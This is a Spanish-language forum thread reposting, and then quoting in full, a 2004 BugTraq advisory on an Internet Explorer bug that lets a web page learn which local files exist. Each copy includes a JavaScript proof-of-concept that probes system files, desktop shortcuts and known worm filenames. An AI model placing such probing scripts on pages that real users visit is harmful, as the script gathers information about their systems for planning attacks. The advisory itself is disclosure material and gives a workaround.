[Info] Explorer es vulnerable USAD MOZILLA FIREFOX

09/11/2004 - 14:50 por hptella | Informe spam
BUGTRAQ ARCHIVE

[ Message Index ] [ Thread Index ] [ Reply ]
[ prev Msg by Date ] [ next Msg by Date ]

To: BugTraq
Subject: Microsoft Internet Explorer permits to examine the existence of
local files
Date: Nov 6 2004 9:29PM
Author: Benjamin Tobias Franz <0-1-2-3 gmx de>
Message-ID: <009301c4c447$df718f20$b6eeb9d9@oemcomputer>

Microsoft Internet Explorer permits to examine the existence of local files


Description:
There is a security bug in Microsoft Internet Explorer, which allows to
check up existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs, because Microsoft Internet Explorer does not open a window,
if the target file exists; but it will open a window, if the file does not
exist.
Also an attacker can use this "feature" to verify existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "Active Scripting" in the IE options menu.

Proof-of-Concept exploit:

<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="&gt; Search &gt;"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3 gmx de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!";
else return "'"+btfp+"' does NOT exist!";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="Search for shortcut files (on desktop) ...";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="Search for virus/worm files ...";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3 gmx de)"+
btfd;
</script>


Date of discovery:
06. November 2004


Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.


My DLL versions:

MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475


Regards,
Benjamin Tobias Franz
Germany


Want to link to this message? Use this URL:
<http://www.securityfocus.com/archive/1/380541>
 

Leer las respuestas

#1 JM Tella Llop [MVP Windows]
09/11/2004 - 20:04 | Informe spam
Jose Manuel Tella Llop
MVP - Windows
(quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.



"HP Tella Llop [MVI Windows[" wrote in message news:
BUGTRAQ ARCHIVE

[ Message Index ] [ Thread Index ] [ Reply ]
[ prev Msg by Date ] [ next Msg by Date ]

To: BugTraq
Subject: Microsoft Internet Explorer permits to examine the existence of
local files
Date: Nov 6 2004 9:29PM
Author: Benjamin Tobias Franz <0-1-2-3 gmx de>
Message-ID: <009301c4c447$df718f20$

Microsoft Internet Explorer permits to examine the existence of local files


Description:
There is a security bug in Microsoft Internet Explorer, which allows to
check up existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs, because Microsoft Internet Explorer does not open a window,
if the target file exists; but it will open a window, if the file does not
exist.
Also an attacker can use this "feature" to verify existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "Active Scripting" in the IE options menu.

Proof-of-Concept exploit:

<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="&gt; Search &gt;"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3 gmx de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!";
else return "'"+btfp+"' does NOT exist!";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="Search for shortcut files (on desktop) ...";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="Search for virus/worm files ...";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value> "Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3 gmx de)"+
btfd;
</script>


Date of discovery:
06. November 2004


Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.


My DLL versions:

MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475


Regards,
Benjamin Tobias Franz
Germany


Want to link to this message? Use this URL:
<http://www.securityfocus.com/archive/1/380541>

Preguntas similares